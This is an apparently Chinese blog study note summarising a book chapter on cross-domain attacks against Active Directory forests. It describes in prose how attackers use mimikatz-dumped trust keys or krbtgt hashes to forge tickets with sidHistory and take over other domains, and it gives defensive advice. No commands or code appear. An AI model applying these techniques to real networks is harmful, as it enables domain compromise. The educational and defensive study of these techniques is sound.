<h1 id="7-跨域攻击分析及防御"><a href="#7-跨域攻击分析及防御" class="headerlink" title="7.跨域攻击分析及防御"></a>7.跨域攻击分析及防御</h1><p><a href="https://blog.csdn.net/qq_34640691/article/details/111881910" target="_blank" rel="noopener">详细介绍</a></p>
<p><a href="https://cloud.tencent.com/developer/article/1899592" target="_blank" rel="noopener">非约束委派&#x2F;约束委派&#x2F;资源委派</a><br>《内网安全攻防：渗透测试实战指南》第7章：跨域攻击分析及防御</p>
<p>如果内网中存在多个域，就会面临跨域攻击。</p>
<p>本章对利用域信任关系实现跨域攻击的典型方法进行了分析，并对如何部署安全的内网生产环境给出了建议。</p>
<h2 id="跨域攻击方法"><a href="#跨域攻击方法" class="headerlink" title="跨域攻击方法"></a>跨域攻击方法</h2><p>大型企业一般通过域林进行共享资源。根据不同只能区分的部门，从逻辑上以主域和子域进行划分，以方便统一管理。在物理层，通常使用防火墙将各个子公司及各个部门划分为不同的区域。攻击者如果得到饿了某个子公司或者某个部门的域控制器全新啊，但没有得到整个公司内网的全部权限（或者需要的资源不在此域中），往往会想办法获取其他部门（或者域）的权限。</p>
<p>常见的跨域攻击方法有：<strong>常规渗透方法（例如利用Web漏洞跨域获取权限）；利用已知域散列值进行哈希传递攻击或者票据传递攻击（例如DC的本地管理员密码相同）；利用域信任关系进行跨域攻击。</strong></p>
<h2 id="域信任关系"><a href="#域信任关系" class="headerlink" title="域信任关系"></a>域信任关系</h2><p>默认情况下，特定Windows域中的所有用户都可以通过该域中的资源进行身份验证。</p>
<p>域信任的作用是解决多域环境中的跨域资源共享问题。域环境不会无条件的接受来自其他域的凭证，如果用户想要访问当前域边界以外的资源，需要使用域信任。<strong>域信任作为域的一种机制，允许另一个域的用户在通过身份验证后访问本域的资源。</strong></p>
<p>从Windows 2003开始，域信任关系变为双向的，且可以通过信任关系进行传递。</p>
<p>只有Domain Admins组中的用户可以管理域信任关系。</p>
<p>在域中，Enterprise Admins组（仅出现在林的根域中）的成员具有对目录林中所有域的完全控制权限。默认情况下，该组包含林中所有域控制器上具有Administrator权限的成员。</p>
<p>(需翻墙)获取域信息：<a href="https://www.joeware.net/freetools/tools/lg/" target="_blank" rel="noopener">lg.exe</a></p>
<p>利用<strong>域信任秘钥（NTLM Hash）</strong>获取目标域的权限：利用mimikatz导出信任秘钥并伪造信任票据（具有sidHistory）、利用asktgs请求TGS、利用kirbikator将TGS信息注入内存，获取目标域的权限。</p>
<p>使用mimikatz可以在构建黄金票据时设置sidHistory，因此，如果攻击者获取了任意域的krbtgt散列值，就可以利用sidHistory获得该林的完整权限。</p>
<p>利用<strong>krbtgt散列值</strong>获取目标域的权限：在DC上使用mimikatz获取krbtgt散列值、在子域使用普通用户权限构造并注入黄金票据，获取目标域的权限。</p>
<h2 id="防范跨域攻击"><a href="#防范跨域攻击" class="headerlink" title="防范跨域攻击"></a>防范跨域攻击</h2><p>外网Web往往会配置WAF以及配备维护人员定期安全检测，而内网的Web（内部办公、测试服务器等）更脆弱，往往存在弱口令和存在未及时补丁的漏洞。</p>
<p>在很多公司中，虽然为不同的部门划分了不同的域，但域管理员可能是同一批人，因此可能出现域管理员的用户名和密码相同的情况。<strong>攻击者在获取当前域的DC权限后，要先检查DC的本地管理员密码是否与其他域的DC本地管理员密码相同。</strong></p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/tags/">标签</a></li>
         
          <li><a href="/friends/">friends</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="https://github.com/TonyD0g">项目</a></li>
         
          <li><a href="/search/">搜索</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#1-前言："><span class="toc-number">1.</span> <span class="toc-text">-1 前言：</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0-内网渗透测试基础"><span class="toc-number">2.</span> <span class="toc-text">0.内网渗透测试基础:</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#1-内网"><span class="toc-number">2.1.</span> <span class="toc-text">1.内网:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-工作组"><span class="toc-number">2.2.</span> <span class="toc-text">2.工作组:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-域"><span class="toc-number">2.3.</span> <span class="toc-text">3.域:</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#域信任"><span class="toc-number">2.3.1.</span> <span class="toc-text">域信任</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4-活动目录"><span class="toc-number">2.4.</span> <span class="toc-text">4.活动目录:</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#活动目录有什么功能"><span class="toc-number">2.4.1.</span> <span class="toc-text">活动目录有什么功能?</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#5-DC和AD区别？"><span class="toc-number">2.5.</span> <span class="toc-text">5.DC和AD区别？</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#6-安全域的划分"><span class="toc-number">2.6.</span> <span class="toc-text">6.安全域的划分:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#7-域内计算机分类"><span class="toc-number">2.7.</span> <span class="toc-text">7.域内计算机分类:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#8-域内权限"><span class="toc-number">2.8.</span> <span class="toc-text">8.域内权限:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#9-组织单元ou"><span class="toc-number">2.9.</span> <span class="toc-text">9.组织单元ou:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#10-内网协议"><span class="toc-number">2.10.</span> <span class="toc-text">10.内网协议</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#1-内网信息搜集"><span class="toc-number">3.</span> <span class="toc-text">1.内网信息搜集:</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#一、收集本机信息"><span class="toc-number">3.1.</span> <span class="toc-text">一、收集本机信息</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-查询网络配置命令："><span class="toc-number">3.1.1.</span> <span class="toc-text">1.查询网络配置命令：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-查询操作系统及软件的信息"><span class="toc-number">3.1.2.</span> <span class="toc-text">2.查询操作系统及软件的信息</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-查询本机服务信息"><span class="toc-number">3.1.3.</span> <span class="toc-text">3.查询本机服务信息</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4-查询进程列表"><span class="toc-number">3.1.4.</span> <span class="toc-text">4.查询进程列表</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#常见杀毒软件进程"><span class="toc-number">3.1.4.1.</span> <span class="toc-text">常见杀毒软件进程</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#5-查看启动程序信息"><span class="toc-number">3.1.5.</span> <span class="toc-text">5.查看启动程序信息</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#6-查看计划任务"><span class="toc-number">3.1.6.</span> <span class="toc-text">6.查看计划任务</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#7-查看主机开机时间"><span class="toc-number">3.1.7.</span> <span class="toc-text">7.查看主机开机时间</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#8-查询用户列表"><span class="toc-number">3.1.8.</span> <span class="toc-text">8.查询用户列表</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#9-列出或断开本地计算机与所连接的客户端之间的会话"><span class="toc-number">3.1.9.</span> <span class="toc-text">9.列出或断开本地计算机与所连接的客户端之间的会话</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#10-查询端口列表"><span class="toc-number">3.1.10.</span> <span class="toc-text">10.查询端口列表</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#11-查询补丁列表"><span class="toc-number">3.1.11.</span> <span class="toc-text">11.查询补丁列表</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#12-查询本机共享列表"><span class="toc-number">3.1.12.</span> <span class="toc-text">12.查询本机共享列表</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#13-查询路由表及所有可用接口的ARP缓存表"><span class="toc-number">3.1.13.</span> <span class="toc-text">13.查询路由表及所有可用接口的ARP缓存表</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#14-查询防火墙相关配置"><span class="toc-number">3.1.14.</span> <span class="toc-text">14.查询防火墙相关配置</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#15-查看代理配置情况"><span class="toc-number">3.1.15.</span> <span class="toc-text">15.查看代理配置情况</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#16-查询并开启远程连接服务"><span class="toc-number">3.1.16.</span> <span class="toc-text">16.查询并开启远程连接服务</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#17-自动收集信息"><span class="toc-number">3.1.17.</span> <span class="toc-text">17. 自动收集信息</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#18-Empire下的主机信息收集"><span class="toc-number">3.1.18.</span> <span class="toc-text">18.Empire下的主机信息收集</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#19-查询当前权限"><span class="toc-number">3.1.19.</span> <span class="toc-text">19. 查询当前权限</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#二、收集域内信息"><span class="toc-number">3.2.</span> <span class="toc-text">二、收集域内信息</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-判断是否存在域"><span class="toc-number">3.2.1.</span> <span class="toc-text">1.判断是否存在域</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-探测域内存活主机"><span class="toc-number">3.2.2.</span> <span class="toc-text">2. 探测域内存活主机</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-扫描域内端口"><span class="toc-number">3.2.3.</span> <span class="toc-text">3.扫描域内端口</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4-收集域内基础信息"><span class="toc-number">3.2.4.</span> <span class="toc-text">4. 收集域内基础信息</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#5-查找域控"><span class="toc-number">3.2.5.</span> <span class="toc-text">5. 查找域控</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#6-获取域内的用户和管理员信息"><span class="toc-number">3.2.6.</span> <span class="toc-text">6. 获取域内的用户和管理员信息</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#7-定位域管理员"><span class="toc-number">3.2.7.</span> <span class="toc-text">7. 定位域管理员</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#8-查找域管理进程"><span class="toc-number">3.2.8.</span> <span class="toc-text">8. 查找域管理进程</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#三、自动化信息收集"><span class="toc-number">3.3.</span> <span class="toc-text">三、自动化信息收集:</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#2-隐藏通信隧道技术"><span class="toc-number">4.</span> <span class="toc-text">2.隐藏通信隧道技术</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#1-判断内网的连通性"><span class="toc-number">4.1.</span> <span class="toc-text">1.判断内网的连通性</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-网络层隧道技术（IPv6、ICMP）"><span class="toc-number">4.2.</span> <span class="toc-text">2.网络层隧道技术（IPv6、ICMP）</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-传输层隧道技术（TCP、UDP）"><span class="toc-number">4.3.</span> <span class="toc-text">3.传输层隧道技术（TCP、UDP）</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4-应用层隧道技术（SSH、HTTP-s、DNS）"><span class="toc-number">4.4.</span> <span class="toc-text">4.应用层隧道技术（SSH、HTTP&#x2F;s、DNS）</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#5-SOCKS代理"><span class="toc-number">4.5.</span> <span class="toc-text">5.SOCKS代理</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#6-压缩数据"><span class="toc-number">4.6.</span> <span class="toc-text">6.压缩数据</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#7-上传和下载"><span class="toc-number">4.7.</span> <span class="toc-text">7.上传和下载</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#3-权限维持分析及防御"><span class="toc-number">5.</span> <span class="toc-text">3.权限维持分析及防御:</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#操作系统后门"><span class="toc-number">5.1.</span> <span class="toc-text">操作系统后门</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Web后门"><span class="toc-number">5.2.</span> <span class="toc-text">Web后门</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#域控制器权限持久化"><span class="toc-number">5.3.</span> <span class="toc-text">域控制器权限持久化</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#利用系统功能"><span class="toc-number">5.3.1.</span> <span class="toc-text">利用系统功能</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#PTT-伪造票据"><span class="toc-number">5.3.2.</span> <span class="toc-text">PTT 伪造票据</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#大致步骤："><span class="toc-number">5.3.2.1.</span> <span class="toc-text">大致步骤：</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#其他方法"><span class="toc-number">5.3.3.</span> <span class="toc-text">其他方法</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#4-权限提升及防御"><span class="toc-number">6.</span> <span class="toc-text">4.权限提升及防御:</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#内核溢出漏洞"><span class="toc-number">6.1.</span> <span class="toc-text">内核溢出漏洞</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#系统配置错误"><span class="toc-number">6.2.</span> <span class="toc-text">系统配置错误</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#组策略首选项提权漏洞"><span class="toc-number">6.3.</span> <span class="toc-text">组策略首选项提权漏洞</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#绕过UAC提权"><span class="toc-number">6.4.</span> <span class="toc-text">绕过UAC提权</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#令牌窃取"><span class="toc-number">6.5.</span> <span class="toc-text">令牌窃取</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#无凭证条件下的权限获取"><span class="toc-number">6.6.</span> <span class="toc-text">无凭证条件下的权限获取</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#5-域控制器安全"><span class="toc-number">7.</span> <span class="toc-text">5.域控制器安全</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#使用卷影拷贝服务提取ntds-dit"><span class="toc-number">7.1.</span> <span class="toc-text">使用卷影拷贝服务提取ntds.dit</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#导出ntds-dit中的散列值"><span class="toc-number">7.2.</span> <span class="toc-text">导出ntds.dit中的散列值</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#利用dcsync获取域散列值"><span class="toc-number">7.3.</span> <span class="toc-text">利用dcsync获取域散列值</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#其他获取域散列值方法"><span class="toc-number">7.4.</span> <span class="toc-text">其他获取域散列值方法</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Kerberos域用户提权漏洞"><span class="toc-number">7.5.</span> <span class="toc-text">Kerberos域用户提权漏洞</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#6-域内横向移动分析及防御"><span class="toc-number">8.</span> <span class="toc-text">6.域内横向移动分析及防御:</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#1-IPC"><span class="toc-number">8.1.</span> <span class="toc-text">1.IPC</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-at-Windows-server-2008之前-计划任务命令"><span class="toc-number">8.2.</span> <span class="toc-text">2.at(Windows server 2008之前)计划任务命令:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-schtasks"><span class="toc-number">8.3.</span> <span class="toc-text">3.schtasks</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4-HashDump"><span class="toc-number">8.4.</span> <span class="toc-text">4.HashDump</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#5-mimikatz"><span class="toc-number">8.5.</span> <span class="toc-text">5.mimikatz:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#6-破解hash-防范方法"><span class="toc-number">8.6.</span> <span class="toc-text">6.破解hash,防范方法:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#7-哈希传递攻击-PTH-需要本地管理员权限"><span class="toc-number">8.7.</span> <span class="toc-text">7.哈希传递攻击:PTH(需要本地管理员权限)</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#8-PTT-票据传递-不需要本地管理员权限"><span class="toc-number">8.8.</span> <span class="toc-text">8.PTT(票据传递,不需要本地管理员权限):</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#9-PsExec"><span class="toc-number">8.9.</span> <span class="toc-text">9.PsExec</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#10-WMI"><span class="toc-number">8.10.</span> <span class="toc-text">10.WMI</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#11-DCOM"><span class="toc-number">8.11.</span> <span class="toc-text">11.DCOM</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#12-SPN"><span class="toc-number">8.12.</span> <span class="toc-text">12.SPN</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#13-Exchange"><span class="toc-number">8.13.</span> <span class="toc-text">13.Exchange</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#7-跨域攻击分析及防御"><span class="toc-number">9.</span> <span class="toc-text">7.跨域攻击分析及防御</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#跨域攻击方法"><span class="toc-number">9.1.</span> <span class="toc-text">跨域攻击方法</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#域信任关系"><span class="toc-number">9.2.</span> <span class="toc-text">域信任关系</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#防范跨域攻击"><span class="toc-number">9.3.</span> <span class="toc-text">防范跨域攻击</span></a></li></ol></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=https://github.com/TonyD0g/2022/03/03/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8%E7%90%86%E8%AE%BA%E7%AF%87%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E5%9F%BA%E7%A1%80/" target="_blank" rel="noopener"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=https://github.com/TonyD0g/2022/03/03/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8%E7%90%86%E8%AE%BA%E7%AF%87%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E5%9F%BA%E7%A1%80/&text=[内网安全]理论篇内网渗透测试基础" target="_blank" rel="noopener"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=https://github.com/TonyD0g/2022/03/03/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8%E7%90%86%E8%AE%BA%E7%AF%87%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E5%9F%BA%E7%A1%80/&title=[内网安全]理论篇内网渗透测试基础" target="_blank" rel="noopener"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=https://github.com/TonyD0g/2022/03/03/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8%E7%90%86%E8%AE%BA%E7%AF%87%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E5%9F%BA%E7%A1%80/&is_video=false&description=[内网安全]理论篇内网渗透测试基础" target="_blank" rel="noopener"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=[内网安全]理论篇内网渗透测试基础&body=Check out this article: https://github.com/TonyD0g/2022/03/03/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8%E7%90%86%E8%AE%BA%E7%AF%87%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E5%9F%BA%E7%A1%80/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=https://github.com/TonyD0g/2022/03/03/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8%E7%90%86%E8%AE%BA%E7%AF%87%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E5%9F%BA%E7%A1%80/&title=[内网安全]理论篇内网渗透测试基础" target="_blank" rel="noopener"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=https://github.com/TonyD0g/2022/03/03/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8%E7%90%86%E8%AE%BA%E7%AF%87%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E5%9F%BA%E7%A1%80/&title=[内网安全]理论篇内网渗透测试基础" target="_blank" rel="noopener"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=https://github.com/TonyD0g/2022/03/03/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8%E7%90%86%E8%AE%BA%E7%AF%87%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E5%9F%BA%E7%A1%80/&title=[内网安全]理论篇内网渗透测试基础" target="_blank" rel="noopener"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=https://github.com/TonyD0g/2022/03/03/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8%E7%90%86%E8%AE%BA%E7%AF%87%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E5%9F%BA%E7%A1%80/&title=[内网安全]理论篇内网渗透测试基础" target="_blank" rel="noopener"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=https://github.com/TonyD0g/2022/03/03/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8%E7%90%86%E8%AE%BA%E7%AF%87%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E5%9F%BA%E7%A1%80/&name=[内网安全]理论篇内网渗透测试基础&description=" target="_blank" rel="noopener"><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://news.ycombinator.com/submitlink?u=https://github.com/TonyD0g/2022/03/03/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8%E7%90%86%E8%AE%BA%E7%AF%87%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E5%9F%BA%E7%A1%80/&t=[内网安全]理论篇内网渗透测试基础" target="_blank" rel="noopener"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2023
    TonyD0g
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/tags/">标签</a></li>
         
          <li><a href="/friends/">friends</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="https://github.com/TonyD0g">项目</a></li>
         
          <li><a href="/search/">搜索</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->

<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">


<link rel="stylesheet" href="/lib/justified-gallery/css/justifiedGallery.min.css">


    <!-- jquery -->

<script src="/lib/jquery/jquery.min.js"></script>


<script src="/lib/justified-gallery/js/jquery.justifiedGallery.min.js"></script>

<!-- clipboard -->

  
<script src="/lib/clipboard/clipboard.min.js"></script>

  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"复制到粘贴板!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "复制成功!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

    <script type="text/javascript">
        (function(i,s,o,g,r,a,m) {i['GoogleAnalyticsObject']=r;i[r]=i[r]||function() {
        (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
        m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
        })(window,document,'script','//www.google-analytics.com/analytics.js','ga');
        ga('create', 'UA-84578611-1', 'auto');
        ga('send', 'pageview');
    </script>

<!-- Baidu Analytics -->

    <script type="text/javascript">
        var _hmt = _hmt || [];
        (function() {
            var hm = document.createElement("script");
            hm.src = "https://hm.baidu.com/hm.js?2e6da3c375c789455b664cea6d4cb29c";
            var s = document.getElementsByTagName("script")[0];
            s.parentNode.insertBefore(hm, s);
        })();
    </script>

<!-- Disqus Comments -->


</body>
</html>
